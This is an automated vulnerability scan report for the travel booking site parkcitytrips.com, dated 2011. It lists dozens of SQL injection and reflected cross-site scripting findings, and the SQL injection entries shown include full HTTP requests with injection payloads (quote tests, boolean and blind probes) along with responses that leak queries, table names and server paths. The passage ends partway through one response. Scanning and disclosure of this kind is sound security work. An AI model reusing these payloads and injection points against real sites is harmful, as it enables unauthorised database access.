SQL Injection, XSS, Cross Site Scripting, parkcitytrips.com, CWE-79, CWE-89

XSS, SQL Injection in parkcitytrips.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Wed Feb 09 17:53:14 CST 2011.


DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://parkcitytrips.com/booking_results.php [cloneID parameter]

1.2. http://parkcitytrips.com/booking_results.php [cloneID parameter]

1.3. http://parkcitytrips.com/booking_results.php [clone_id parameter]

1.4. http://parkcitytrips.com/booking_results.php [group_id parameter]

1.5. http://parkcitytrips.com/booking_results.php [nights parameter]

1.6. http://parkcitytrips.com/booking_results.php [rooms parameter]

1.7. http://parkcitytrips.com/booking_results.php [sDay parameter]

1.8. http://parkcitytrips.com/booking_results.php [sMonth parameter]

1.9. http://parkcitytrips.com/booking_results.php [sYear parameter]

1.10. http://parkcitytrips.com/redirect.php [catID parameter]

1.11. http://parkcitytrips.com/redirect.php [clickSourceID parameter]

1.12. http://parkcitytrips.com/redirect.php [cloneID parameter]

1.13. http://parkcitytrips.com/redirect.php [eventID parameter]

1.14. http://parkcitytrips.com/redirect.php [eventID parameter]

1.15. http://parkcitytrips.com/redirect.php [group_id parameter]

1.16. http://parkcitytrips.com/redirect.php [linkTypeID parameter]

1.17. http://parkcitytrips.com/redirect_booking.php [cloneID parameter]

1.18. http://parkcitytrips.com/redirect_booking.php [clone_id parameter]

1.19. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [cloneID parameter]

1.20. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [eventID parameter]

1.21. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [name of an arbitrarily supplied request parameter]

1.22. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [cloneID parameter]

1.23. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [eventID parameter]

2. Cross-site scripting (reflected)

2.1. http://parkcitytrips.com/ [name of an arbitrarily supplied request parameter]

2.2. http://parkcitytrips.com/ [name of an arbitrarily supplied request parameter]

2.3. http://parkcitytrips.com/booking_results.php [cloneID parameter]

2.4. http://parkcitytrips.com/booking_results.php [clone_id parameter]

2.5. http://parkcitytrips.com/booking_results.php [group_id parameter]

2.6. http://parkcitytrips.com/booking_results.php [name of an arbitrarily supplied request parameter]

2.7. http://parkcitytrips.com/booking_results.php [rooms parameter]

2.8. http://parkcitytrips.com/booking_results.php [rooms parameter]

2.9. http://parkcitytrips.com/booking_results.php [sDay parameter]

2.10. http://parkcitytrips.com/booking_results.php [sMonth parameter]

2.11. http://parkcitytrips.com/booking_results.php [sYear parameter]

2.12. http://parkcitytrips.com/redirect.php [cloneID parameter]

2.13. http://parkcitytrips.com/redirect.php [eventID parameter]

2.14. http://parkcitytrips.com/redirect.php [linkTypeID parameter]

2.15. http://parkcitytrips.com/redirect.php [linkTypeID parameter]

2.16. http://parkcitytrips.com/redirect.php [linkTypeID parameter]

2.17. http://parkcitytrips.com/redirect_booking.php [Submit.x parameter]

2.18. http://parkcitytrips.com/redirect_booking.php [Submit.x parameter]

2.19. http://parkcitytrips.com/redirect_booking.php [Submit.y parameter]

2.20. http://parkcitytrips.com/redirect_booking.php [Submit.y parameter]

2.21. http://parkcitytrips.com/redirect_booking.php [cloneID parameter]

2.22. http://parkcitytrips.com/redirect_booking.php [clone_id parameter]

2.23. http://parkcitytrips.com/redirect_booking.php [end-date parameter]

2.24. http://parkcitytrips.com/redirect_booking.php [end-date parameter]

2.25. http://parkcitytrips.com/redirect_booking.php [group_id parameter]

2.26. http://parkcitytrips.com/redirect_booking.php [group_id parameter]

2.27. http://parkcitytrips.com/redirect_booking.php [lodgingID parameter]

2.28. http://parkcitytrips.com/redirect_booking.php [lodgingID parameter]

2.29. http://parkcitytrips.com/redirect_booking.php [name of an arbitrarily supplied request parameter]

2.30. http://parkcitytrips.com/redirect_booking.php [name of an arbitrarily supplied request parameter]

2.31. http://parkcitytrips.com/redirect_booking.php [nights parameter]

2.32. http://parkcitytrips.com/redirect_booking.php [nights parameter]

2.33. http://parkcitytrips.com/redirect_booking.php [rooms parameter]

2.34. http://parkcitytrips.com/redirect_booking.php [rooms parameter]

2.35. http://parkcitytrips.com/redirect_booking.php [sDay parameter]

2.36. http://parkcitytrips.com/redirect_booking.php [sDay parameter]

2.37. http://parkcitytrips.com/redirect_booking.php [sMonth parameter]

2.38. http://parkcitytrips.com/redirect_booking.php [sMonth parameter]

2.39. http://parkcitytrips.com/redirect_booking.php [sYear parameter]

2.40. http://parkcitytrips.com/redirect_booking.php [sYear parameter]

2.41. http://parkcitytrips.com/redirect_booking.php [start-date parameter]

2.42. http://parkcitytrips.com/redirect_booking.php [start-date parameter]

2.43. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [cloneID parameter]

2.44. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [eDate parameter]

2.45. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [eventID parameter]

2.46. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [sDate parameter]

2.47. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php [sitename parameter]

2.48. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [cloneID parameter]

2.49. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php [eventID parameter]

3. SQL statement in request parameter

4. Cookie without HttpOnly flag set

4.1. http://parkcitytrips.com/booking_results.php

4.2. http://parkcitytrips.com/css/parkcity_template.css

4.3. http://parkcitytrips.com/images/bookdirect_images/parkcityinfo.com/formBkg_winter.png

4.4. http://parkcitytrips.com/images/bookdirect_images/parkcityinfo.com/search_winter.jpg

4.5. http://parkcitytrips.com/scripts/cal_scripts.js

4.6. http://parkcitytrips.com/scripts/jquery-1.3.2.js

4.7. http://parkcitytrips.com/scripts/jquery.autocomplete.js

4.8. http://parkcitytrips.com/scripts/jquery.qtip-1.0.0-rc3.min.js

4.9. http://parkcitytrips.com/scripts/mapiconmaker.js

4.10. http://parkcitytrips.com/scripts/sorttable.js

4.11. http://parkcitytrips.com/scripts/ui.core.js

4.12. http://parkcitytrips.com/scripts/ui.datepickerN.js

5. Cross-domain Referer leakage

5.1. http://parkcitytrips.com/booking_results.php

5.2. http://parkcitytrips.com/booking_results.php

5.3. http://parkcitytrips.com/booking_results.php

5.4. http://parkcitytrips.com/booking_results.php

5.5. http://parkcitytrips.com/booking_results.php

5.6. http://parkcitytrips.com/booking_results.php

5.7. http://parkcitytrips.com/booking_results.php

5.8. http://parkcitytrips.com/booking_results.php

5.9. http://parkcitytrips.com/redirect_booking.php

5.10. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php

5.11. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php

6. Cross-domain script include

7. Content type incorrectly stated

7.1. http://parkcitytrips.com/booking_results.php

7.2. http://parkcitytrips.com/redirect.php

7.3. http://parkcitytrips.com/v002/dbase/php_ajax/booking_results_count.php

7.4. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php

7.5. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php



1. SQL injection  next
There are 23 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://parkcitytrips.com/booking_results.php [cloneID parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the cloneID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /booking_results.php?cloneID=41%20and%201%3d1--%20&rooms=1&nights=1&group_id=-982%27OR%201=1))%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3E0-- HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: parkcitytrips.com
Cookie: PHPSESSID=rtbf9mia87rdbeie5r94s1lge3; SERVERID=i-07d1a66e
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:47:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1711


Error: A problem was encountered while executing the query <i>SELECT DISTINCT e.id as eventID, e.title, e.url, e.phone_1, e.phone_2, e.pic_fileName, e.smallDescription, e.latitude, e.longitude, e.inTrips, e.inBooking, e.inCalendar, e.inListing, e.inMap, e.geolocationString, ecat.start_Date, ecat.end_Date, erc.rating_category_id, sum(if(ev.field_id = 3, 1, 0)) as jrs_client, e.hide_image, e.hide_amenities, e.use_min_stay_field, e.large_image, e.zipcode, if(e.sort_rating is null,100,e.sort_rating) as sort_rating , et.title as localTitle, et.description as localDescription from events as e left join event_translations as et on e.id = et.event_id and et.locale = 'en' left join events_values as ev on e.id = ev.event_id left join events_rating_categories as erc on e.id = erc.event_id join events_categories as ecat on e.id = ecat.event_id and ecat.cat_id = 103 join events_clones as ecl on e.id = ecl.event_id and ecl.clone_id = 41 and 1=1-- where e.id in (1383,1384,1385,1386,1387,1388,1389,1390,1393,1394,1395,1396,1398,1399,1400,1401,1403,1405,1407,1410,1411,1413,1414,1415,1416,1418,1419,1421,1422,1423,1424,1425,1426,1427,1428,1429,1430,1431,1432,1434,1435,1436,1437,1438,1439,1441,1443,1448,1449,1450,1452,1453,1455,1456,1460,1462,1472,1492,1493,1494,1495,1496,1504,1505,1511,1570,1572,1573,1577,1579,1580,1730,1732,2578,7369,37578,37579,37580,37642,38674,41699,42689) and ecat.start_Date <= '2011-02-15' and ecat.end_Date >= '2011-02-14' and ecat.inactiveDate = '0000-00-00' and ecl.inactiveDate = '0000-00-00' and e.inactive != 1 group by e.id ORDER BY position, title</i> Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Request 2

GET /booking_results.php?cloneID=41%20and%201%3d2--%20&rooms=1&nights=1&group_id=-982%27OR%201=1))%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3E0-- HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: parkcitytrips.com
Cookie: PHPSESSID=rtbf9mia87rdbeie5r94s1lge3; SERVERID=i-07d1a66e
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:47:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 425


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = -982'OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0--' at line 1

1.2. http://parkcitytrips.com/booking_results.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cloneID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /booking_results.php?cloneID=41'&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:46:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qille5ojan7vur2nv07a1ov1n6; path=/
Connection: close
Content-Length: 276

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.3. http://parkcitytrips.com/booking_results.php [clone_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The clone_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the clone_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /booking_results.php?clone_id=41'&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:49:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 276
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT template_path,template_style FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.4. http://parkcitytrips.com/booking_results.php [group_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The group_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the group_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /booking_results.php?clone_id=41&group_id=982' HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:50:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 298
Content-Type: text/html; charset=UTF-8
Connection: close


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = 982'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.5. http://parkcitytrips.com/booking_results.php [nights parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The nights parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the nights parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /booking_results.php?cloneID=41&rooms=1&nights=1'&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?clone_id=41&group_id=982
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response 1

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:56:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 674


Error: A problem was encountered while executing the query <i>INSERT INTO bookingSubmissions(cloneID, date, nights, rooms, adults, children, categoryID, eventsString, ipAddress, groupID, resubmit) V
...[SNIP]...

Request 2

GET /booking_results.php?cloneID=41&rooms=1&nights=1''&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?clone_id=41&group_id=982
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response 2

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:57:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 419840


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...

1.6. http://parkcitytrips.com/booking_results.php [rooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The rooms parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rooms parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /booking_results.php?cloneID=41&rooms=1'&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 1

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:47:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=66rkej6osanqqdbgidkv64ouc3; path=/
Connection: close
Content-Length: 674


Error: A problem was encountered while executing the query <i>INSERT INTO bookingSubmissions(cloneID, date, nights, rooms, adults, children, categoryID, eventsString, ipAddress, groupID, resubmit) V
...[SNIP]...

Request 2

GET /booking_results.php?cloneID=41&rooms=1''&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 2

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:47:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f7opmtboi57r589jo0hm322rc3; path=/
Connection: close
Content-Length: 369949


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...

1.7. http://parkcitytrips.com/booking_results.php [sDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The sDay parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sDay parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26'&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 1

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:52:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vdgplveermt72ktfrjr0n224q3; path=/
Connection: close
Content-Length: 1992


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
Error: A problem was
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0000-00-00' and ecl.inactiveDate = '0000-00-00' and e.inactive != 1 group by ' at line 1

Request 2

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26''&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 2

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:52:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6ei94ooqrel405iij129g0t3c7; path=/
Connection: close
Content-Length: 48602


<br />
